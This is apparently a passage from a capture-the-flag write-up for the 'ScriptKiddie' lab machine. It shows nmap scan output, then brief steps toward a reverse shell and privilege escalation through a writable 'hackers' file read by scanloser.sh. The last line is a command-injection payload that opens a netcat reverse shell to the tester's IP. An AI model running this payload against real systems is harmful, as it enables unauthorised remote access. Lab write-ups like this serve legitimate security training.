# Nmap 7.91 scan initiated Wed May 19 10:36:41 2021 as: nmap -sC -sV -oA nmap/ScriptKiddie 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 19 10:37:45 2021 -- 1 IP address (1 host up) scanned in 64.18 seconds
We can see this time port 5000 is open and is TCP. Let's navigate it through our browser.
After changing the exploit, and uploaded it, we will get a reverse shell
We found a script laying at pwn user home directory which is scanloser.sh
We can see here the script takes the contents of the hackers file and execute it.
Indeed, the hacker file is writable.
Soon enough, we understand that the cut -d' ' -f3- means it will cut off the first 2 and take the 3rd words depend on the delimiters supply to the command.
We can craft a payload like this and write it to hacker file
echo "a a ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.4 4445 >/tmp/f;" >> hackers